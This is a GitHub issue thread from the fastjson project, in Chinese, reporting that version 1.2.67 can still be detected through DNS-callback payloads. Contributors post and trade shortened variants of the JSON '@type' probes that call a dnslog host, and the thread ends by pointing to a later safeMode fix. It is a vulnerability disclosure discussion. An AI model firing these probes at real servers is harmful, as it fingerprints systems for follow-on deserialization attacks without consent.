Fastjson: 发现最新版本1.2.67依然可以通过dnslog判断后端是否使用fastjson

Created on 23 Mar 2020  ·  14Comments  ·  Source: alibaba/fastjson

java.net.InetAddress虽然被禁止了,但是依然可以使用如下两个payload探测后端是否是fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

Most helpful comment

不造你为啥要变那么畸形

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

All 14 comments

而且无需开启autotype

java.net.InetAddress虽然被禁止了,但是依然可以使用如下两个payload探测后端是否是fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

nice work, thx!

我再发一个畸形的

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

@retanoj nb,下午也刚好和其他师傅聊到这个payload

新知识get

还有很早的那个ysoserial里的由HashMap触发的URLDNS也能用,只不过也有点畸形

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}

然而都没啥卵用啊,只能发个dns

学习了

不造你为啥要变那么畸形

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

看样子,最新的bypass也快出来了:)

@threedr3am
赞,再短点

Set[{"@type":"java.net.URL","val":"dnslog"}]

再短

Set[{"@type":"java.net.URL","val":"dnslog"}

{{"@type":"java.net.URL","val":"dnslog"}:0

amazing :-)

tql

能获取到啥敏感信息吗

https://github.com/alibaba/fastjson/releases/tag/1.2.68
1.2.68版本提供了safeMode配置,可以完全禁用autoType,包括白名单和黑名单。

Was this page helpful?
0 / 5 - 0 ratings

Related issues

yemengsky picture yemengsky  ·  5Comments

ITcathyh picture ITcathyh  ·  3Comments

gongxyu picture gongxyu  ·  3Comments

luckydzp picture luckydzp  ·  4Comments

ZYRzyr picture ZYRzyr  ·  3Comments